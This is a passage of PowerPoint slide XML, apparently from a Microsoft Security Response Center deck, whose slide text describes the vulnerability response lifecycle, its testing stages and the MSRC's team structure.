              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>SWI and Product Team</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Look for variations</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31758" name="Group 32"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4189413"/>
            <a:ext cx="1905000" cy="2411412"/>
            <a:chOff x="2256" y="2639"/>
            <a:chExt cx="1200" cy="1266"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31763" name="Group 33"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2267" y="2639"/>
              <a:ext cx="1169" cy="617"/>
              <a:chOff x="2496" y="2544"/>
              <a:chExt cx="1169" cy="617"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31765" name="Picture 34" descr="Slide-8_RedBox"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2496" y="2544"/>
                <a:ext cx="1169" cy="617"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43043" name="Text Box 35"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2652" y="2707"/>
                <a:ext cx="720" cy="143"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="85000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buClr>
                    <a:schemeClr val="folHlink"/>
                  </a:buClr>
                  <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Test</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31764" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256" y="3137"/>
              <a:ext cx="1200" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Several levels of testing:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" lvl="1" indent="-168275">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Setup and Build Verification</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" lvl="1" indent="-168275">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Depth</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" lvl="1" indent="-168275">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Integration and Breadth</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" lvl="1" indent="-168275">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Microsoft network </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" lvl="1" indent="-168275">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Controlled beta</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31759" name="Picture 38" descr="Slide-8_RedBox"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5511800" y="3876675"/>
            <a:ext cx="1855788" cy="1176338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43047" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5607050" y="4013200"/>
            <a:ext cx="1460500" cy="635000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Update Dev Tools and Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5475288" y="4819650"/>
            <a:ext cx="1809750" cy="1006475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Update best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Update testing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Update development and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>design process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43049" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="304800"/>
            <a:ext cx="8393113" cy="757238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The Response Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>MSRC Today</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8477250" cy="4845050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Industry Leading Vulnerability Response Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSRC Case Managers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Release Management Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Engineers (SWIReact &amp; ICI &amp; MSAV)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Communications Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Community Outreach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSRC Partner Outreach (CERTs, ISVs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root Cause Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ext Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5057775" y="3182938"/>
            <a:ext cx="4276725" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1255713" lvl="2" indent="-227013">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="95000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="050595"/>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040188" y="3675063"/>
            <a:ext cx="2697162" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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rot="16200000" flipH="1">
            <a:off x="5419725" y="2711450"/>
            <a:ext cx="2143125" cy="22225"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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36" name="Oval 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492625" y="1611313"/>
            <a:ext cx="3943350" cy="3943350"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102225" y="2333625"/>
            <a:ext cx="1419225" cy="1404938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1651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rot="5400000" flipH="1" flipV="1">
            <a:off x="5375275" y="2470151"/>
            <a:ext cx="2416175" cy="2387600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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91" name="Straight Connector 90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="36" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5132388" y="2189163"/>
            <a:ext cx="2727325" cy="161925"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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95" name="Straight Connector 94"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="1"/>
            <a:endCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3676650" y="3582988"/>
            <a:ext cx="2789237" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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98" name="Straight Connector 97"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="2"/>
            <a:endCxn id="36" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4492625" y="2189163"/>
            <a:ext cx="3367088" cy="1393825"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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01" name="Straight Connector 100"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="4"/>
            <a:endCxn id="36" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5479257" y="3174206"/>
            <a:ext cx="3365500" cy="1395413"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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flipV="1">
            <a:off x="5222875" y="4967288"/>
            <a:ext cx="2936875" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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05" name="Straight Connector 104"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="2"/>
            <a:endCxn id="36" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="4492625" y="3582988"/>
            <a:ext cx="3367088" cy="1393825"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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08" name="Straight Connector 107"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="4"/>
            <a:endCxn id="36" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6464300" y="3582988"/>
            <a:ext cx="1971675" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="1524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59" name="Oval 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962650" y="3217863"/>
            <a:ext cx="879475" cy="863600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="39999">
                <a:srgbClr val="0A128C"/>
              </a:gs>
              <a:gs pos="70000">
                <a:srgbClr val="181CC7"/>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="7005D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="8C3D91"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect r="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
